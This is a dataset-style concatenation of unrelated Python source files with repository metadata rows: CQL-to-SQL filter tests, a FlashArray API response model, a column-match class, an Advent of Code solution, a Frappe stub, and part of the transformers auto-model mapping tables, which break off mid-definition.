    feature.SetField("date_attr", "2010-01-10")
    feature.SetField("datetime_attr", "2010-10-01T00:00:00Z")
    layer.CreateFeature(feature)
    feature = None
    return source
# CQL attribute name -> SQL column name used when building the WHERE clause.
FIELD_MAPPING = {
    'str_attr': 'str_attr',
    'maybe_str_attr': 'maybe_str_attr',
    'int_attr': 'int_attr',
    'float_attr': 'float_attr',
    'date_attr': 'date_attr',
    'datetime_attr': 'datetime_attr',
    'point_attr': 'GEOMETRY',
}

# CQL function name -> SQL function name.
FUNCTION_MAP = {
    'sin': 'sin'
}
def filter_(ast, data):
    """Translate *ast* to a SQL WHERE clause and execute it against *data*.

    Returns the result layer produced by OGR's ExecuteSQL (SQLite dialect).
    """
    where = to_sql_where(ast, FIELD_MAPPING, FUNCTION_MAP)
    return data.ExecuteSQL(f"""
    SELECT id, str_attr, maybe_str_attr, int_attr, float_attr, date_attr, datetime_attr, GEOMETRY
    FROM layer
    WHERE {where}
    """, None, "SQLite")
def test_comparison(data):
    """Each binary comparison operator selects exactly one of the two features."""
    cases = [
        ('int_attr = 5', 0),
        ('int_attr < 6', 0),
        ('int_attr > 6', 1),
        ('int_attr <= 5', 0),
        ('int_attr >= 8', 1),
        ('int_attr <> 5', 1),
    ]
    for expression, expected_id in cases:
        result = filter_(parse(expression), data)
        assert result.GetFeatureCount() == 1
        assert result.GetFeature(0).GetField(0) == expected_id
def test_combination(data):
    """AND / OR combinations of two comparisons.

    NOTE(review): the original ran the identical AND expression twice, which
    looked like a copy/paste slip; the second case now exercises OR instead.
    """
    result = filter_(parse('int_attr = 5 AND float_attr < 6.0'), data)
    assert result.GetFeatureCount() == 1
    assert result.GetFeature(0).GetField(0) == 0
    # Only feature 0 (int_attr=5, float_attr=5.5) satisfies either clause;
    # feature 1 has int_attr=8 and float_attr=8.5.
    result = filter_(parse('int_attr = 5 OR float_attr < 6.0'), data)
    assert result.GetFeatureCount() == 1
    assert result.GetFeature(0).GetField(0) == 0
def test_between(data):
    """BETWEEN / NOT BETWEEN range predicates each select exactly one feature."""
    for expression, expected_id in [
        ('float_attr BETWEEN 4 AND 6', 0),
        ('int_attr NOT BETWEEN 4 AND 6', 1),
    ]:
        result = filter_(parse(expression), data)
        assert result.GetFeatureCount() == 1
        assert result.GetFeature(0).GetField(0) == expected_id
def test_like(data):
    """LIKE / NOT LIKE / ILIKE pattern matching ('.' single char, '%' wildcard)."""
    cases = [
        ("str_attr LIKE 'this is . test'", [0]),
        ("str_attr LIKE 'this is % test'", [0, 1]),
        ("str_attr NOT LIKE '% another test'", [0]),
        ("str_attr NOT LIKE 'this is . test'", [1]),
        ("str_attr ILIKE 'THIS IS . TEST'", [0]),
        ("str_attr ILIKE 'THIS IS % TEST'", [0, 1]),
    ]
    for expression, expected_ids in cases:
        result = filter_(parse(expression), data)
        assert result.GetFeatureCount() == len(expected_ids)
        if len(expected_ids) == 1:
            assert result.GetFeature(0).GetField(0) == expected_ids[0]
def test_in(data):
    """IN / NOT IN list membership each match exactly one feature."""
    for expression, expected_id in [
        ('int_attr IN ( 1, 2, 3, 4, 5 )', 0),
        ('int_attr NOT IN ( 1, 2, 3, 4, 5 )', 1),
    ]:
        result = filter_(parse(expression), data)
        assert result.GetFeatureCount() == 1
        assert result.GetFeature(0).GetField(0) == expected_id
def test_null(data):
    """IS NULL / IS NOT NULL on the nullable string attribute."""
    for expression, expected_id in [
        ('maybe_str_attr IS NULL', 0),
        ('maybe_str_attr IS NOT NULL', 1),
    ]:
        result = filter_(parse(expression), data)
        assert result.GetFeatureCount() == 1
        assert result.GetFeature(0).GetField(0) == expected_id
# TODO: possible?
# def test_has_attr(data):
# result = filter_(parse('extra_attr EXISTS'), data)
# assert len(result) == 1 and result[0] is data[0]
# result = filter_(parse('extra_attr DOES-NOT-EXIST'), data)
# assert len(result) == 1 and result[0] is data[1]
# def test_temporal(data):
# result = filter_(
# parse('date_attr BEFORE 2010-01-08T00:00:00.00Z'),
# data
# )
# assert len(result) == 1 and result.index[0] == 0
# result = filter_(
# parse('date_attr AFTER 2010-01-08T00:00:00.00+01:00'),
# data
# )
# assert len(result) == 1 and result.index[0] == 1
def test_spatial(data):
    """Spatial predicates (INTERSECTS, EQUALS) against the point geometries."""
    for expression, expected_id in [
        ('INTERSECTS(point_attr, ENVELOPE (0 1 0 1))', 0),
        ('EQUALS(point_attr, POINT(2 2))', 1),
    ]:
        result = filter_(parse(expression), data)
        assert result.GetFeatureCount() == 1
        assert result.GetFeature(0).GetField(0) == expected_id
def test_arithmetic(data):
    """Arithmetic expressions are evaluated inside the generated SQL."""
    # Both features satisfy int_attr = float_attr - 0.5 (5/5.5 and 8/8.5).
    result = filter_(
        parse('int_attr = float_attr - 0.5'),
        data,
    )
    assert result.GetFeatureCount() == 2
    # 5 + 20 / 2 - 10 == 5, so only the first feature matches.
    result = filter_(
        parse('int_attr = 5 + 20 / 2 - 10'),
        data,
    )
    assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
def test_function(data):
    """Function calls are mapped through FUNCTION_MAP (here: sin)."""
    # sin(5.5) is approximately -0.7055, so only the first feature matches.
    result = filter_(
        parse('sin(float_attr) BETWEEN -0.75 AND -0.70'),
        data,
    )
    assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
| 33.446512
| 101
| 0.664303
|
4a0a20038c2552f31fb5f2c6376d5d8783aee838
| 5,402
|
py
|
Python
|
pypureclient/flasharray/FA_2_5/models/protection_group_get_response.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 14
|
2018-12-07T18:30:27.000Z
|
2022-02-22T09:12:33.000Z
|
pypureclient/flasharray/FA_2_5/models/protection_group_get_response.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 28
|
2019-09-17T21:03:52.000Z
|
2022-03-29T22:07:35.000Z
|
pypureclient/flasharray/FA_2_5/models/protection_group_get_response.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 15
|
2020-06-11T15:50:08.000Z
|
2022-03-21T09:27:25.000Z
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_5 import models
class ProtectionGroupGetResponse(object):
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # OpenAPI type of every declared attribute.
    swagger_types = {
        'more_items_remaining': 'bool',
        'total_item_count': 'int',
        'continuation_token': 'str',
        'items': 'list[ProtectionGroup]',
        'total': 'list[ProtectionGroup]'
    }
    # Python attribute name -> JSON key in the API payload (identical here).
    attribute_map = {
        'more_items_remaining': 'more_items_remaining',
        'total_item_count': 'total_item_count',
        'continuation_token': 'continuation_token',
        'items': 'items',
        'total': 'total'
    }
    # No constructor arguments are mandatory for this response model.
    required_args = {
    }

    def __init__(
        self,
        more_items_remaining=None,  # type: bool
        total_item_count=None,  # type: int
        continuation_token=None,  # type: str
        items=None,  # type: List[models.ProtectionGroup]
        total=None,  # type: List[models.ProtectionGroup]
    ):
        """
        Keyword args:
            more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
            total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
            continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
            items (list[ProtectionGroup]): Returns a list of all items after filtering. The values are displayed for each name where meaningful. If `total_only=true`, the `items` list will be empty.
            total (list[ProtectionGroup]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
        """
        # Only explicitly supplied values are stored; attributes left unset
        # are treated as absent by __getattribute__ and to_dict below.
        if more_items_remaining is not None:
            self.more_items_remaining = more_items_remaining
        if total_item_count is not None:
            self.total_item_count = total_item_count
        if continuation_token is not None:
            self.continuation_token = continuation_token
        if items is not None:
            self.items = items
        if total is not None:
            self.total = total

    def __setattr__(self, key, value):
        """Reject assignment to attributes that are not part of the model."""
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ProtectionGroupGetResponse`".format(key))
        self.__dict__[key] = value

    def __getattribute__(self, item):
        """Make attributes that still hold the Property sentinel look unset."""
        value = object.__getattribute__(self, item)
        if isinstance(value, Property):
            raise AttributeError
        else:
            return value

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Iterate declared attributes; hasattr skips unset ones (see
        # __getattribute__ above), recursing into nested models and lists.
        for attr, _ in six.iteritems(self.swagger_types):
            if hasattr(self, attr):
                value = getattr(self, attr)
                if isinstance(value, list):
                    result[attr] = list(map(
                        lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                        value
                    ))
                elif hasattr(value, "to_dict"):
                    result[attr] = value.to_dict()
                elif isinstance(value, dict):
                    result[attr] = dict(map(
                        lambda item: (item[0], item[1].to_dict())
                        if hasattr(item[1], "to_dict") else item,
                        value.items()
                    ))
                else:
                    result[attr] = value
        # Generated-code guard: inert here, since this class derives from
        # object rather than dict.
        if issubclass(ProtectionGroupGetResponse, dict):
            for key, value in self.items():
                result[key] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ProtectionGroupGetResponse):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 39.720588
| 524
| 0.61903
|
4a0a2287628e420f3fd25e9926104d795ebf2232
| 916
|
py
|
Python
|
valentine/algorithms/match.py
|
delftdata/valentine
|
3be3fcbe91f1a838f21399eeb5e6ec97f4b94e76
|
[
"Apache-2.0"
] | 20
|
2020-11-18T16:10:38.000Z
|
2022-01-26T09:09:54.000Z
|
valentine/algorithms/match.py
|
delftdata/valentine
|
3be3fcbe91f1a838f21399eeb5e6ec97f4b94e76
|
[
"Apache-2.0"
] | 6
|
2021-10-15T11:25:23.000Z
|
2021-11-16T10:21:48.000Z
|
valentine/algorithms/match.py
|
delftdata/valentine
|
3be3fcbe91f1a838f21399eeb5e6ec97f4b94e76
|
[
"Apache-2.0"
] | 4
|
2021-06-07T11:02:04.000Z
|
2021-11-05T21:50:52.000Z
|
class Match:
    """A single correspondence between two columns.

    *target* is the column we are looking for matches of, *source* is another
    column that exists in the database, and *similarity* is their score.
    NOTE: use the ``to_dict`` property when appending a match to a list of
    matches.
    """

    def __init__(self, target_table_name: str, target_column_name: str,
                 source_table_name: str, source_column_name: str,
                 similarity: float):
        """Store the endpoints and the similarity score of the match."""
        self.target_table_name = target_table_name
        self.target_column_name = target_column_name
        self.source_table_name = source_table_name
        self.source_column_name = source_column_name
        self.similarity = similarity

    @property
    def to_dict(self) -> dict:
        """Map ((source_table, source_col), (target_table, target_col)) -> score."""
        source = (self.source_table_name, self.source_column_name)
        target = (self.target_table_name, self.target_column_name)
        return {(source, target): self.similarity}
| 43.619048
| 111
| 0.694323
|
4a0a229a5ef6c6c1c3bf022333c5bfcf2a509f75
| 838
|
py
|
Python
|
Day15/Day15.py
|
wagyourtail/Advent-Of-Code
|
f6b8dc796ef54555c5630453f4011d5b472ac9cc
|
[
"MIT"
] | null | null | null |
Day15/Day15.py
|
wagyourtail/Advent-Of-Code
|
f6b8dc796ef54555c5630453f4011d5b472ac9cc
|
[
"MIT"
] | null | null | null |
Day15/Day15.py
|
wagyourtail/Advent-Of-Code
|
f6b8dc796ef54555c5630453f4011d5b472ac9cc
|
[
"MIT"
] | null | null | null |
def part1(inp):
    """Play the memory game until 2020 numbers have been spoken.

    Extends *inp* in place (preserving the original behavior) and returns the
    2020th spoken number.  Uses a last-seen index map instead of the original
    O(n^2) backwards scan over the whole list on every turn.
    """
    # Most recent index of every number spoken before the current last one.
    last_seen = {value: index for index, value in enumerate(inp[:-1])}
    while len(inp) < 2020:
        prev = inp[-1]
        prev_index = len(inp) - 1
        if prev in last_seen:
            # Gap between the last two utterances of the previous number.
            inp.append(prev_index - last_seen[prev])
        else:
            # First time spoken: the next number is 0.
            inp.append(0)
        last_seen[prev] = prev_index
    return inp[-1]
def part2(inp, leng):
    """Return the *leng*-th spoken number of the memory game seeded by *inp*."""
    # Turn index at which each seed number (except the last) was spoken.
    last_seen = {value: turn for turn, value in enumerate(inp[:-1])}
    current = inp[-1]
    for turn in range(len(inp) - 1, leng - 1):
        if current in last_seen:
            # Previously spoken: next number is the gap between utterances.
            nxt = turn - last_seen[current]
        else:
            # First utterance: next number is 0.
            nxt = 0
        last_seen[current] = turn
        current = nxt
    return current
def main():
    """Solve both puzzle parts for the fixed input and print the answers."""
    starting_numbers = [int(token) for token in "8,11,0,19,1,2".split(",")]
    part_one = part2(starting_numbers[:], 2020)
    print(f"Part1: {part_one}")
    part_two = part2(starting_numbers, 30000000)
    print(f"Part2: {part_two}")
if __name__ == "__main__":
    # Only run the solver when executed as a script.
    main()
| 20.95
| 59
| 0.424821
|
4a0a230543c463bb2d7bb78e6df68268614226f0
| 274
|
py
|
Python
|
one_fm/legal/doctype/legal_investigation_penalty/legal_investigation_penalty.py
|
askmetoo/One-FM
|
c93ed63695a3e62ee8129bd9adf563116b749030
|
[
"MIT"
] | 16
|
2021-06-14T23:56:47.000Z
|
2022-03-22T12:05:06.000Z
|
one_fm/legal/doctype/legal_investigation_penalty/legal_investigation_penalty.py
|
askmetoo/One-FM
|
c93ed63695a3e62ee8129bd9adf563116b749030
|
[
"MIT"
] | 119
|
2020-08-17T16:27:45.000Z
|
2022-03-28T12:42:56.000Z
|
one_fm/legal/doctype/legal_investigation_penalty/legal_investigation_penalty.py
|
askmetoo/One-FM
|
c93ed63695a3e62ee8129bd9adf563116b749030
|
[
"MIT"
] | 12
|
2021-05-16T13:35:40.000Z
|
2022-02-21T12:41:04.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2020, omar jaber and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class LegalInvestigationPenalty(Document):
    """Frappe DocType controller; all behavior comes from the Document base class."""
    pass
| 24.909091
| 49
| 0.784672
|
4a0a25291003cf3331ade74e4ce91f99a4731e88
| 61
|
py
|
Python
|
code/python/array_add.py
|
evmorov/ruby-coffeescript
|
1c61c5ce351509b210e26feceee6efab0b255442
|
[
"MIT"
] | 29
|
2016-06-15T09:19:18.000Z
|
2022-03-21T14:34:47.000Z
|
code/python/array_add.py
|
evmorov/ruby-coffeescript
|
1c61c5ce351509b210e26feceee6efab0b255442
|
[
"MIT"
] | 7
|
2016-06-16T07:02:43.000Z
|
2020-01-08T21:12:30.000Z
|
code/python/array_add.py
|
evmorov/ruby-coffeescript
|
1c61c5ce351509b210e26feceee6efab0b255442
|
[
"MIT"
] | 7
|
2016-06-15T14:57:46.000Z
|
2021-12-09T17:57:22.000Z
|
# Demonstrate growing a list one element at a time, then display it.
arr = []
for element in ('first', 'second'):
    arr.append(element)
print(arr)
| 12.2
| 20
| 0.655738
|
4a0a254d5c5a480bb21531ae5eb0328aee72073a
| 73,675
|
py
|
Python
|
src/transformers/models/auto/modeling_auto.py
|
timpal0l/transformers
|
d86d57faa3b6511c6e4d9139535d77b695b9af8a
|
[
"Apache-2.0"
] | 2
|
2020-11-30T11:30:40.000Z
|
2021-03-26T17:20:33.000Z
|
src/transformers/models/auto/modeling_auto.py
|
timpal0l/transformers
|
d86d57faa3b6511c6e4d9139535d77b695b9af8a
|
[
"Apache-2.0"
] | 1
|
2020-11-12T11:00:12.000Z
|
2020-11-12T11:00:12.000Z
|
src/transformers/models/auto/modeling_auto.py
|
timpal0l/transformers
|
d86d57faa3b6511c6e4d9139535d77b695b9af8a
|
[
"Apache-2.0"
] | 1
|
2020-11-17T02:48:00.000Z
|
2020-11-17T02:48:00.000Z
|
# coding=utf-8
# Copyright 2018 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Auto Model class. """
import warnings
from collections import OrderedDict
from ...configuration_utils import PretrainedConfig
from ...file_utils import add_start_docstrings
from ...utils import logging
# Add modeling imports here
from ..albert.modeling_albert import (
AlbertForMaskedLM,
AlbertForMultipleChoice,
AlbertForPreTraining,
AlbertForQuestionAnswering,
AlbertForSequenceClassification,
AlbertForTokenClassification,
AlbertModel,
)
from ..bart.modeling_bart import (
BartForConditionalGeneration,
BartForQuestionAnswering,
BartForSequenceClassification,
BartModel,
)
from ..bert.modeling_bert import (
BertForMaskedLM,
BertForMultipleChoice,
BertForNextSentencePrediction,
BertForPreTraining,
BertForQuestionAnswering,
BertForSequenceClassification,
BertForTokenClassification,
BertLMHeadModel,
BertModel,
)
from ..bert_generation.modeling_bert_generation import BertGenerationDecoder, BertGenerationEncoder
from ..blenderbot.modeling_blenderbot import BlenderbotForConditionalGeneration
from ..camembert.modeling_camembert import (
CamembertForCausalLM,
CamembertForMaskedLM,
CamembertForMultipleChoice,
CamembertForQuestionAnswering,
CamembertForSequenceClassification,
CamembertForTokenClassification,
CamembertModel,
)
from ..ctrl.modeling_ctrl import CTRLLMHeadModel, CTRLModel
from ..deberta.modeling_deberta import DebertaForSequenceClassification, DebertaModel
from ..distilbert.modeling_distilbert import (
DistilBertForMaskedLM,
DistilBertForMultipleChoice,
DistilBertForQuestionAnswering,
DistilBertForSequenceClassification,
DistilBertForTokenClassification,
DistilBertModel,
)
from ..dpr.modeling_dpr import DPRQuestionEncoder
from ..electra.modeling_electra import (
ElectraForMaskedLM,
ElectraForMultipleChoice,
ElectraForPreTraining,
ElectraForQuestionAnswering,
ElectraForSequenceClassification,
ElectraForTokenClassification,
ElectraModel,
)
from ..encoder_decoder.modeling_encoder_decoder import EncoderDecoderModel
from ..flaubert.modeling_flaubert import (
FlaubertForMultipleChoice,
FlaubertForQuestionAnsweringSimple,
FlaubertForSequenceClassification,
FlaubertForTokenClassification,
FlaubertModel,
FlaubertWithLMHeadModel,
)
from ..fsmt.modeling_fsmt import FSMTForConditionalGeneration, FSMTModel
from ..funnel.modeling_funnel import (
FunnelForMaskedLM,
FunnelForMultipleChoice,
FunnelForPreTraining,
FunnelForQuestionAnswering,
FunnelForSequenceClassification,
FunnelForTokenClassification,
FunnelModel,
)
from ..gpt2.modeling_gpt2 import GPT2ForSequenceClassification, GPT2LMHeadModel, GPT2Model
from ..layoutlm.modeling_layoutlm import LayoutLMForMaskedLM, LayoutLMForTokenClassification, LayoutLMModel
from ..longformer.modeling_longformer import (
LongformerForMaskedLM,
LongformerForMultipleChoice,
LongformerForQuestionAnswering,
LongformerForSequenceClassification,
LongformerForTokenClassification,
LongformerModel,
)
from ..lxmert.modeling_lxmert import LxmertForPreTraining, LxmertForQuestionAnswering, LxmertModel
from ..marian.modeling_marian import MarianMTModel
from ..mbart.modeling_mbart import MBartForConditionalGeneration
from ..mobilebert.modeling_mobilebert import (
MobileBertForMaskedLM,
MobileBertForMultipleChoice,
MobileBertForNextSentencePrediction,
MobileBertForPreTraining,
MobileBertForQuestionAnswering,
MobileBertForSequenceClassification,
MobileBertForTokenClassification,
MobileBertModel,
)
from ..mt5.modeling_mt5 import MT5ForConditionalGeneration, MT5Model
from ..openai.modeling_openai import OpenAIGPTForSequenceClassification, OpenAIGPTLMHeadModel, OpenAIGPTModel
from ..pegasus.modeling_pegasus import PegasusForConditionalGeneration
from ..prophetnet.modeling_prophetnet import ProphetNetForCausalLM, ProphetNetForConditionalGeneration, ProphetNetModel
from ..rag.modeling_rag import ( # noqa: F401 - need to import all RagModels to be in globals() function
RagModel,
RagSequenceForGeneration,
RagTokenForGeneration,
)
from ..reformer.modeling_reformer import (
ReformerForMaskedLM,
ReformerForQuestionAnswering,
ReformerForSequenceClassification,
ReformerModel,
ReformerModelWithLMHead,
)
from ..retribert.modeling_retribert import RetriBertModel
from ..roberta.modeling_roberta import (
RobertaForCausalLM,
RobertaForMaskedLM,
RobertaForMultipleChoice,
RobertaForQuestionAnswering,
RobertaForSequenceClassification,
RobertaForTokenClassification,
RobertaModel,
)
from ..squeezebert.modeling_squeezebert import (
SqueezeBertForMaskedLM,
SqueezeBertForMultipleChoice,
SqueezeBertForQuestionAnswering,
SqueezeBertForSequenceClassification,
SqueezeBertForTokenClassification,
SqueezeBertModel,
)
from ..t5.modeling_t5 import T5ForConditionalGeneration, T5Model
from ..transfo_xl.modeling_transfo_xl import TransfoXLLMHeadModel, TransfoXLModel
from ..xlm.modeling_xlm import (
XLMForMultipleChoice,
XLMForQuestionAnsweringSimple,
XLMForSequenceClassification,
XLMForTokenClassification,
XLMModel,
XLMWithLMHeadModel,
)
from ..xlm_prophetnet.modeling_xlm_prophetnet import (
XLMProphetNetForCausalLM,
XLMProphetNetForConditionalGeneration,
XLMProphetNetModel,
)
from ..xlm_roberta.modeling_xlm_roberta import (
XLMRobertaForCausalLM,
XLMRobertaForMaskedLM,
XLMRobertaForMultipleChoice,
XLMRobertaForQuestionAnswering,
XLMRobertaForSequenceClassification,
XLMRobertaForTokenClassification,
XLMRobertaModel,
)
from ..xlnet.modeling_xlnet import (
XLNetForMultipleChoice,
XLNetForQuestionAnsweringSimple,
XLNetForSequenceClassification,
XLNetForTokenClassification,
XLNetLMHeadModel,
XLNetModel,
)
from .configuration_auto import (
AlbertConfig,
AutoConfig,
BartConfig,
BertConfig,
BertGenerationConfig,
BlenderbotConfig,
CamembertConfig,
CTRLConfig,
DebertaConfig,
DistilBertConfig,
DPRConfig,
ElectraConfig,
EncoderDecoderConfig,
FlaubertConfig,
FSMTConfig,
FunnelConfig,
GPT2Config,
LayoutLMConfig,
LongformerConfig,
LxmertConfig,
MarianConfig,
MBartConfig,
MobileBertConfig,
MT5Config,
OpenAIGPTConfig,
PegasusConfig,
ProphetNetConfig,
ReformerConfig,
RetriBertConfig,
RobertaConfig,
SqueezeBertConfig,
T5Config,
TransfoXLConfig,
XLMConfig,
XLMProphetNetConfig,
XLMRobertaConfig,
XLNetConfig,
replace_list_option_in_docstrings,
)
logger = logging.get_logger(__name__)


# Each OrderedDict below maps a configuration class to the model class that the
# corresponding AutoModel* factory instantiates for it.
# NOTE(review): the ordering appears deliberate (more specific configs are
# listed before their base classes, e.g. FlaubertConfig before XLMConfig) —
# preserve it when adding entries; TODO confirm against the lookup logic.

MODEL_MAPPING = OrderedDict(
    [
        # Base model mapping
        (RetriBertConfig, RetriBertModel),
        (MT5Config, MT5Model),
        (T5Config, T5Model),
        (DistilBertConfig, DistilBertModel),
        (AlbertConfig, AlbertModel),
        (CamembertConfig, CamembertModel),
        (XLMRobertaConfig, XLMRobertaModel),
        (BartConfig, BartModel),
        (LongformerConfig, LongformerModel),
        (RobertaConfig, RobertaModel),
        (LayoutLMConfig, LayoutLMModel),
        (SqueezeBertConfig, SqueezeBertModel),
        (BertConfig, BertModel),
        (OpenAIGPTConfig, OpenAIGPTModel),
        (GPT2Config, GPT2Model),
        (MobileBertConfig, MobileBertModel),
        (TransfoXLConfig, TransfoXLModel),
        (XLNetConfig, XLNetModel),
        (FlaubertConfig, FlaubertModel),
        (FSMTConfig, FSMTModel),
        (XLMConfig, XLMModel),
        (CTRLConfig, CTRLModel),
        (ElectraConfig, ElectraModel),
        (ReformerConfig, ReformerModel),
        (FunnelConfig, FunnelModel),
        (LxmertConfig, LxmertModel),
        (BertGenerationConfig, BertGenerationEncoder),
        (DebertaConfig, DebertaModel),
        (DPRConfig, DPRQuestionEncoder),
        (XLMProphetNetConfig, XLMProphetNetModel),
        (ProphetNetConfig, ProphetNetModel),
    ]
)

MODEL_FOR_PRETRAINING_MAPPING = OrderedDict(
    [
        # Model for pre-training mapping
        (LayoutLMConfig, LayoutLMForMaskedLM),
        (RetriBertConfig, RetriBertModel),
        (T5Config, T5ForConditionalGeneration),
        (DistilBertConfig, DistilBertForMaskedLM),
        (AlbertConfig, AlbertForPreTraining),
        (CamembertConfig, CamembertForMaskedLM),
        (XLMRobertaConfig, XLMRobertaForMaskedLM),
        (BartConfig, BartForConditionalGeneration),
        (FSMTConfig, FSMTForConditionalGeneration),
        (LongformerConfig, LongformerForMaskedLM),
        (RobertaConfig, RobertaForMaskedLM),
        (SqueezeBertConfig, SqueezeBertForMaskedLM),
        (BertConfig, BertForPreTraining),
        (OpenAIGPTConfig, OpenAIGPTLMHeadModel),
        (GPT2Config, GPT2LMHeadModel),
        (MobileBertConfig, MobileBertForPreTraining),
        (TransfoXLConfig, TransfoXLLMHeadModel),
        (XLNetConfig, XLNetLMHeadModel),
        (FlaubertConfig, FlaubertWithLMHeadModel),
        (XLMConfig, XLMWithLMHeadModel),
        (CTRLConfig, CTRLLMHeadModel),
        (ElectraConfig, ElectraForPreTraining),
        (LxmertConfig, LxmertForPreTraining),
        (FunnelConfig, FunnelForPreTraining),
    ]
)

MODEL_WITH_LM_HEAD_MAPPING = OrderedDict(
    [
        # Model with LM heads mapping
        (LayoutLMConfig, LayoutLMForMaskedLM),
        (T5Config, T5ForConditionalGeneration),
        (DistilBertConfig, DistilBertForMaskedLM),
        (AlbertConfig, AlbertForMaskedLM),
        (CamembertConfig, CamembertForMaskedLM),
        (XLMRobertaConfig, XLMRobertaForMaskedLM),
        (MarianConfig, MarianMTModel),
        (FSMTConfig, FSMTForConditionalGeneration),
        (BartConfig, BartForConditionalGeneration),
        (LongformerConfig, LongformerForMaskedLM),
        (RobertaConfig, RobertaForMaskedLM),
        (SqueezeBertConfig, SqueezeBertForMaskedLM),
        (BertConfig, BertForMaskedLM),
        (OpenAIGPTConfig, OpenAIGPTLMHeadModel),
        (GPT2Config, GPT2LMHeadModel),
        (MobileBertConfig, MobileBertForMaskedLM),
        (TransfoXLConfig, TransfoXLLMHeadModel),
        (XLNetConfig, XLNetLMHeadModel),
        (FlaubertConfig, FlaubertWithLMHeadModel),
        (XLMConfig, XLMWithLMHeadModel),
        (CTRLConfig, CTRLLMHeadModel),
        (ElectraConfig, ElectraForMaskedLM),
        (EncoderDecoderConfig, EncoderDecoderModel),
        (ReformerConfig, ReformerModelWithLMHead),
        (FunnelConfig, FunnelForMaskedLM),
    ]
)

MODEL_FOR_CAUSAL_LM_MAPPING = OrderedDict(
    [
        # Model for Causal LM mapping
        (CamembertConfig, CamembertForCausalLM),
        (XLMRobertaConfig, XLMRobertaForCausalLM),
        (RobertaConfig, RobertaForCausalLM),
        (BertConfig, BertLMHeadModel),
        (OpenAIGPTConfig, OpenAIGPTLMHeadModel),
        (GPT2Config, GPT2LMHeadModel),
        (TransfoXLConfig, TransfoXLLMHeadModel),
        (XLNetConfig, XLNetLMHeadModel),
        (
            XLMConfig,
            XLMWithLMHeadModel,
        ),  # XLM can be MLM and CLM => model should be split similar to BERT; leave here for now
        (CTRLConfig, CTRLLMHeadModel),
        (ReformerConfig, ReformerModelWithLMHead),
        (BertGenerationConfig, BertGenerationDecoder),
        (XLMProphetNetConfig, XLMProphetNetForCausalLM),
        (ProphetNetConfig, ProphetNetForCausalLM),
    ]
)

MODEL_FOR_MASKED_LM_MAPPING = OrderedDict(
    [
        # Model for Masked LM mapping
        (LayoutLMConfig, LayoutLMForMaskedLM),
        (DistilBertConfig, DistilBertForMaskedLM),
        (AlbertConfig, AlbertForMaskedLM),
        (BartConfig, BartForConditionalGeneration),
        (CamembertConfig, CamembertForMaskedLM),
        (XLMRobertaConfig, XLMRobertaForMaskedLM),
        (LongformerConfig, LongformerForMaskedLM),
        (RobertaConfig, RobertaForMaskedLM),
        (SqueezeBertConfig, SqueezeBertForMaskedLM),
        (BertConfig, BertForMaskedLM),
        (MobileBertConfig, MobileBertForMaskedLM),
        (FlaubertConfig, FlaubertWithLMHeadModel),
        (XLMConfig, XLMWithLMHeadModel),
        (ElectraConfig, ElectraForMaskedLM),
        (ReformerConfig, ReformerForMaskedLM),
        (FunnelConfig, FunnelForMaskedLM),
    ]
)

MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING = OrderedDict(
    [
        # Model for Seq2Seq Causal LM mapping
        (MT5Config, MT5ForConditionalGeneration),
        (T5Config, T5ForConditionalGeneration),
        (PegasusConfig, PegasusForConditionalGeneration),
        (MarianConfig, MarianMTModel),
        (MBartConfig, MBartForConditionalGeneration),
        (BlenderbotConfig, BlenderbotForConditionalGeneration),
        (BartConfig, BartForConditionalGeneration),
        (FSMTConfig, FSMTForConditionalGeneration),
        (EncoderDecoderConfig, EncoderDecoderModel),
        (XLMProphetNetConfig, XLMProphetNetForConditionalGeneration),
        (ProphetNetConfig, ProphetNetForConditionalGeneration),
    ]
)

MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING = OrderedDict(
    [
        # Model for Sequence Classification mapping
        (DistilBertConfig, DistilBertForSequenceClassification),
        (AlbertConfig, AlbertForSequenceClassification),
